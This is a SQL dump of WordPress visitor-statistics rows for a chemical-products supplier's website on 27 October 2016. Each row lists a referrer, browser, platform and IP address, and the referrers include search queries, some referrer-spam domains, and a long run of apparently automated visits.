INSERT INTO `wp_statistics_visitor` VALUES (12818, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.171', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12819, '2016-10-27', 'https://www.miller-stephenson.com/products/detail.aspx?ItemId=52', 'MSIE', 'Windows', '9.0', '', '182.118.20.165', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12820, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.192', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12821, '2016-10-27', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjRv53s2_vPAhXGjFQKHR44BM4QFggsMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '67.128.26.170', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12822, '2016-10-27', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '130.184.23.204', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12823, '2016-10-27', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '127.0.0.1', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12824, '2016-10-27', 'https://www.bing.com/search?q=epikure%203282&qs=n&form=QBRE&pq=epikure%203282&sc=8-12&sp=-1&sk=&ghc=1&cvid=EF877B2714644831B2EAB5D20DF1FFA9', 'MSIE', 'Windows', '11.0', '', '50.250.33.65', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12825, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '53.0.2785.124', '', '66.87.72.78', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12826, '2016-10-27', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.87.95.252', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12827, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '107.221.192.238', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12828, '2016-10-27', 'https://www.bing.com/search?q=urethane+conformal+coating+ms-472c+data+sheet&form=HPDTDF&pc=EUPP_HPDTDF&src=IE-SearchBox', 'MSIE', 'Windows', '11.0', '', '50.73.214.170', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12829, '2016-10-27', 'https://www.google.com/aclk?sa=L&ai=DChcSEwi8zMqf2_vPAhXEX34KHaoXDMUYABAA&ei=olQSWJbQM5mWjQOkzaP4CA&sig=AOD64_1mfX9FsHc8-lDBL_XEveFU-8rpgQ&rct=j&q=&sqi=2&ved=0ahUKEwiWqcef2_vPAhUZS2MKHaTmCI8Q0QwIhwE&adurl=', 'MSIE', 'Windows', '11.0', '', '159.83.168.252', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12830, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '98.182.126.162', '000', 22, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12831, '2016-10-27', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjo-7f44fvPAhVDHT4KHTriCa4QFgggMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136811127,d.cWw', 'MSIE', 'Windows', '11.0', '', '70.91.220.33', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12832, '2016-10-27', 'https://www.bing.com/search?q=how+to+remove+pfpe+oil&form=PRDLC1&src=IE11TR&pc=DCTE&adlt=strict', 'MSIE', 'Windows', '11.0', '', '50.203.142.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12833, '2016-10-27', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '108.183.28.192', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12834, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '51.0.2704.81', '', '174.201.18.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12835, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Android', '38.0.2125.102', '', '107.77.90.117', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12836, '2016-10-27', 'https://kharkov.mistr-x.org/', 'MSIE', 'Windows', '6.0', '', '46.119.119.89', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12837, '2016-10-27', 'https://r.search.yahoo.com/_ylt=AwrBT8MqYBJYsKkA.hdXNyoA;_ylu=X3oDMTByOHZyb21tBGNvbG8DYmYxBHBvcwMxBHZ0aWQDBHNlYwNzcg--/RV=2/RE=1477628075/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2f/RK=0/RS=TD7NrHfF2mFR0tqLuLzJ9LUZH5A-', 'Firefox', 'Windows', '49.0', '', '71.219.37.173', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12838, '2016-10-27', 'https://www.miller-stephenson.com', 'AppleWebKit', 'Macintosh', '602.2.14', '', '103.220.32.10', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12839, '2016-10-27', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjt-qHa5vvPAhVKzlQKHcO4Dw0QFggxMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Frelease-agents%2F&usg=AFQjCNHbwMDofHjUU2PB95SWZra5M3XNKA&bvm=bv.136811127,d.cGc', 'MSIE', 'Windows', '11.0', '', '130.76.186.18', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12840, '2016-10-27', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/krytox-lubricants/?gclid=CjwKEAjwy8bABRD5osXMovTHpmQSJACfZY0FRLpUkKp3ihiApuByKZ-jdy_uI_0AgQgElBD4gro-iBoCBErw_wcB', 'Chrome', 'Android', '38.0.2125.102', '', '98.24.247.169', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12841, '2016-10-27', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjjtLK_6PvPAhXD4iYKHV0fAnYQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '129.230.236.45', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12842, '2016-10-27', 'https://www.google.com.mx/', 'Chrome', 'Windows', '49.0.2623.112', '', '200.76.19.162', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12843, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '192.168.1.102', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12844, '2016-10-27', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwix0Mag6vvPAhUL4GMKHSEkAi0QFghWMAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-ts4-thread-sealant%2F&usg=AFQjCNEGB1aqvfg60rQDrR0S19ueZZOeAQ', 'MSIE', 'Windows', '11.0', '', '50.58.14.5', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12845, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '74.219.116.182', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12846, '2016-10-27', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '141.248.197.91', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12847, '2016-10-27', 'https://www.bing.com/search?q=EPON%20Resin%201001F%20Solid%20Epoxy%20Resin&qs=n&form=QBRE&pq=epon%20resin%201001f%20solid%20epoxy%20resin&sc=0-34&sp=-1&sk=&cvid=89FC3B84DFF2465B976AB98373AF30EA', 'MSIE', 'Windows', '11.0', '', '40.140.26.106', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12848, '2016-10-27', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0', '', '134.174.140.104', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12849, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '173.16.82.117', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12850, '2016-10-27', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwi96ZLl8_vPAhUG6WMKHfDpC5YQFggxMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemical-products%2F&usg=AFQjCNE8qBZocicJ0jc8jOvnmnO2NLoR6w', 'MSIE', 'Windows', '11.0', '', '76.191.72.1', '000', 21, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12851, '2016-10-27', 'https://meduza-consult.ru/', 'MSIE', 'Windows', '6.0', '', '5.248.253.78', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12852, '2016-10-27', 'https://nalogovyy-kodeks.ru/', 'Opera', 'Windows', '8.00', '', '5.248.253.78', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12853, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.195', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12854, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.121', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12855, '2016-10-27', 'https://www.google.gr/', 'Chrome', 'Windows', '54.0.2840.71', '', '5.55.87.131', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12856, '2016-10-27', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '600.1.4', '', '166.137.244.24', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12857, '2016-10-27', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '66.2.50.66', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12858, '2016-10-27', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.27.22', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12859, '2016-10-27', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwjp3cnR-fvPAhWrrlQKHZDgA8sQFggoMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fsolvents%2Fsolvsys%2F&usg=AFQjCNHwnwv-phXOZtryGtezeF2J4a2-ow&sig2=RLgsyNmYWlPhc1kXkTzXAQ', 'MSIE', 'Windows', '11.0', '', '192.31.242.194', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12860, '2016-10-27', 'https://www.miller-stephenson.com', 'Microsoft-WebDAV-MiniRedir', 'Unknown', '6.1.7601', '', '192.31.242.194', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12861, '2016-10-27', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '24.155.37.244', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12862, '2016-10-27', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '134.253.34.126', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12863, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.59', '', '76.8.212.90', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12864, '2016-10-27', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwjbm43j_fvPAhUpi1QKHSXUAbcQFghPMAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-240az%2F&usg=AFQjCNEwNURE0QzS32SjwIAsgrEmgcDasg&bvm=bv.136811127,d.cGc', 'MSIE', 'Windows', '11.0', '', '142.52.203.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12865, '2016-10-27', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '69.129.235.226', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12866, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '53.0.2785.116', '', '104.198.252.64', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12867, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '8.20.181.104', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12868, '2016-10-27', 'https://www.bing.com/search?q=heloxy+505&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.73', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12869, '2016-10-27', 'https://www.miller-stephenson.com/chemicals/epoxy-resin-systems/heloxyepoxy-functional-modifiers/heloxy-flexibilizers/', 'MSIE', 'Windows', '9.0', '', '204.79.180.22', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12870, '2016-10-27', 'https://7fon.ru/', 'MSIE', 'Windows', '6.0', '', '178.137.95.202', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12871, '2016-10-27', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '5.82.176.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12872, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '45.0.2454.85', '', '165.91.183.83', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12873, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.18.184.85', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12874, '2016-10-27', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '46.234.230.6', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12875, '2016-10-27', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '64.64.223.242', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12876, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.2', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12877, '2016-10-27', 'https://www.electroyou.it/forum/viewtopic.php?f=1&t=42874&start=60', 'Firefox', 'Windows', '49.0', '', '82.215.184.80', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12878, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.81', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12879, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.134', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12880, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '158.184.198.4', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12881, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '218.92.147.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12882, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '117.69.181.2', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12883, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '237.41.135.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12884, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '156.19.193.64', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12885, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '151.84.126.172', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12886, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '215.37.143.156', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12887, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '97.93.59.182', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12888, '2016-10-27', 'https://www.miller-stephenson.com/miller/support.html', 'Chrome', 'Windows', '54.0.2840.71', '', '192.168.10.68', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12889, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '102.219.175.120', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12890, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '117.179.83.225', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12891, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '75.124.246.120', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12892, '2016-10-27', 'https://www.google.com/', 'Safari', 'Macintosh', '9.1.1', '', '140.180.246.135', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12893, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '230.136.124.92', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12894, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '74.120.71.127', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12895, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '128.73.137.113', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12896, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '101.114.118.232', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12897, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '58.222.103.53', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12898, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '19.81.254.252', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12899, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '43.0.2357.134', '', '66.199.22.250', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12900, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '197.24.97.65', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12901, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '63.85.232.22', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12902, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '178.212.193.17', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12903, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '100.36.115.15', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12904, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '170.253.205.213', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12905, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '204.161.54.86', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12906, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '15.137.137.15', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12907, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '203.81.235.145', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12908, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '86.128.250.146', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12909, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '102.118.170.215', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12910, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '44.122.59.195', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12911, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '33.246.114.239', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12912, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '134.213.95.210', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12913, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '162.63.126.231', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12914, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '119.190.151.157', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12915, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '202.52.17.241', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12916, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '163.67.84.51', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12917, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '65.160.164.78', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12918, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '126.93.206.168', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12919, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '104.43.28.32', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12920, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '32.114.239.83', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12921, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '109.30.28.134', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12922, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '202.125.64.190', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12923, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '227.232.168.213', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12924, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '43.133.132.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12925, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '165.99.8.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12926, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '254.136.36.173', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12927, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '214.98.93.198', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12928, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '249.207.210.33', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12929, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '251.217.36.213', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12930, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '166.100.229.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12931, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '48.21.208.91', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12932, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '231.118.147.231', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12933, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '39.100.75.39', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12934, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '227.140.228.14', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12935, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '194.224.44.200', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12936, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '199.146.51.107', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12937, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '22.82.87.118', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12938, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '194.23.62.208', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12939, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '54.239.8.170', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12940, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '31.222.141.14', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12941, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '184.129.140.117', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12942, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '14.103.200.96', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12943, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '136.254.150.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12944, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '33.96.97.252', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12945, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '11.133.63.10', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12946, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '254.198.122.88', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12947, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '83.252.73.247', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12948, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '200.252.252.146', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12949, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '22.203.249.34', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12950, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '229.59.125.98', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12951, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '94.91.57.252', '000', 1, 0); 
